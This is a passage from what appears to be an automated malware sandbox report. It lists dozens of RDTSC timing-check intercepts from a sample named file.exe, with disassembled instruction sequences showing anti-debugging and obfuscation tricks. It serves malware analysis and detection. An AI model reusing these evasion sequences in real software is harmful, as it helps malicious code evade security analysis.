eax 0x00000069 push edx 0x0000006a jmp 00007F5AD8CCF443h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC112C second address: FC1130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4B97 second address: FC4BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5AD8CCF436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC6C07 second address: FC6CC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F5AD8CCD668h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov bx, 30C0h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov bx, di 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 pushad 0x0000003a mov ecx, edx 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp+122D0909h] 0x00000043 call 00007F5AD8CCD66Ah 0x00000048 or bh, 00000062h 0x0000004b pop edi 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push edi 0x00000051 call 00007F5AD8CCD668h 0x00000056 pop edi 0x00000057 mov dword ptr [esp+04h], edi 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc edi 0x00000064 push edi 0x00000065 ret 0x00000066 pop edi 0x00000067 ret 0x00000068 mov di, 3581h 0x0000006c nop 0x0000006d jmp 00007F5AD8CCD673h 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F5AD8CCD678h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC7C1C second address: FC7CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007F5AD8CCF441h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F5AD8CCF438h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov edi, 28D47587h 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov ebx, dword ptr [ebp+122D1B36h] 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 jl 00007F5AD8CCF43Eh 0x0000004e pushad 0x0000004f mov ecx, dword ptr [ebp+122DB817h] 0x00000055 popad 0x00000056 mov eax, dword ptr [ebp+122D0B05h] 0x0000005c sub dword ptr [ebp+122D303Ah], esi 0x00000062 push FFFFFFFFh 0x00000064 sbb ebx, 05F53F00h 0x0000006a push eax 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F5AD8CCF442h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1130 second address: FC1154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5AD8CCD676h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCE470 second address: FCE4D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F5AD8CCF436h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F5AD8CCF449h 0x00000012 push 00000000h 0x00000014 mov ebx, dword ptr [ebp+122D3984h] 0x0000001a mov edi, dword ptr [ebp+122D37B4h] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F5AD8CCF438h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov bh, al 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push esi 0x00000043 pop esi 0x00000044 jng 00007F5AD8CCF436h 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC7CB2 second address: FC7CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4C43 second address: FC4C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF384 second address: FCF39E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AD8CCD676h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCBFE8 second address: FCC00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F5AD8CCF445h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF39E second address: FCF3E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 3700D010h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F5AD8CCD668h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D35D2h], edx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+1245A28Fh], esi 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF3E2 second address: FCF3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF3E6 second address: FCF409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD66Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jp 00007F5AD8CCD66Eh 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD041C second address: FD042B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD042B second address: FD0440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F5AD8CCD666h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD0440 second address: FD0446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD156A second address: FD156E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD156E second address: FD158B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5AD8CCF445h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCE60C second address: FCE68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F5AD8CCD668h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov edi, eax 0x00000025 push dword ptr fs:[00000000h] 0x0000002c add dword ptr [ebp+122D32C7h], eax 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov ebx, dword ptr [ebp+122D1B75h] 0x0000003f mov eax, dword ptr [ebp+122D02ADh] 0x00000045 mov ebx, edx 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F5AD8CCD668h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 00000014h 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 movsx ebx, dx 0x00000066 push eax 0x00000067 jo 00007F5AD8CCD678h 0x0000006d push eax 0x0000006e push edx 0x0000006f jnl 00007F5AD8CCD666h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD36CD second address: FD375A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5AD8CCF447h 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F5AD8CCF43Fh 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F5AD8CCF438h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F5AD8CCF438h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f jmp 00007F5AD8CCF43Eh 0x00000054 push 00000000h 0x00000056 mov bx, cx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD375A second address: FD3765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5AD8CCD666h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD471B second address: FD4734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD06DB second address: FD06F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F5AD8CCD668h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD06F1 second address: FD06F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD06F5 second address: FD06FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD1747 second address: FD1758 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jbe 00007F5AD8CCF450h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD6C96 second address: FD6C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD2787 second address: FD27A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AD8CCF447h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD27A2 second address: FD27BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F5AD8CCD67Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5AD8CCD66Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD388A second address: FD3890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD394C second address: FD3950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3950 second address: FD3961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F5AD8CCF436h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3961 second address: FD3965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4966 second address: FD496A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD496A second address: FD496E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD496E second address: FD4974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4974 second address: FD4979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE5DD second address: FDE5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE5E1 second address: FDE5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jl 00007F5AD8CCD666h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE5F2 second address: FDE5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE5FB second address: FDE5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE394F second address: FE3955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE3A38 second address: FE3A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5AD8CCD677h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jnp 00007F5AD8CCD66Ah 0x00000017 push esi 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop esi 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5AD8CCD677h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE3A80 second address: E01BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F5AD8CCF43Bh 0x00000012 pop eax 0x00000013 jne 00007F5AD8CCF440h 0x00000019 push dword ptr [ebp+122D00B9h] 0x0000001f cld 0x00000020 call dword ptr [ebp+122D178Ch] 0x00000026 pushad 0x00000027 jmp 00007F5AD8CCF43Dh 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f sbb di, CCF1h 0x00000034 cmc 0x00000035 popad 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a pushad 0x0000003b push ecx 0x0000003c pop edx 0x0000003d mov dword ptr [ebp+122D32C7h], edx 0x00000043 popad 0x00000044 mov dword ptr [ebp+122D3890h], eax 0x0000004a mov dword ptr [ebp+122D32C7h], esi 0x00000050 jns 00007F5AD8CCF43Ch 0x00000056 mov esi, 0000003Ch 0x0000005b jbe 00007F5AD8CCF442h 0x00000061 jnl 00007F5AD8CCF43Ch 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D32C7h], edi 0x00000071 lodsw 0x00000073 cmc 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 cmc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e mov dword ptr [ebp+122D2466h], edx 0x00000084 push eax 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 jmp 00007F5AD8CCF447h 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7688D second address: F768A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCD670h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE8B5E second address: FE8B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF443h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE940A second address: FE9410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9410 second address: FE9421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5AD8CCF436h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9421 second address: FE9425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9716 second address: FE971A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE971A second address: FE9743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F5AD8CCD668h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F5AD8CCD66Eh 0x00000018 push edx 0x00000019 jnl 00007F5AD8CCD666h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9743 second address: FE9748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9748 second address: FE9755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5AD8CCD666h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE98DA second address: FE98EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE98EE second address: FE98F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9B8B second address: FE9BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF444h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE287 second address: FEE28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE28D second address: FEE291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE291 second address: FEE29B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5AD8CCD666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE431 second address: FEE43D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE43D second address: FEE44D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE44D second address: FEE453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE453 second address: FEE46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD678h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE46F second address: FEE496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F5AD8CCF454h 0x0000000e push ecx 0x0000000f jmp 00007F5AD8CCF446h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEA3A second address: FEEA84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5AD8CCD66Ch 0x0000000e jnc 00007F5AD8CCD67Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F5AD8CCD666h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEA84 second address: FEEA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEA88 second address: FEEA8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEA8C second address: FEEA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEA9A second address: FEEA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEA9F second address: FEEAA4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEBD3 second address: FEEBD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEBD8 second address: FEEBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5AD8CCF449h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF022 second address: FEF03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCD675h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF03D second address: FEF048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF048 second address: FEF04E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9EC2B second address: F9EC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
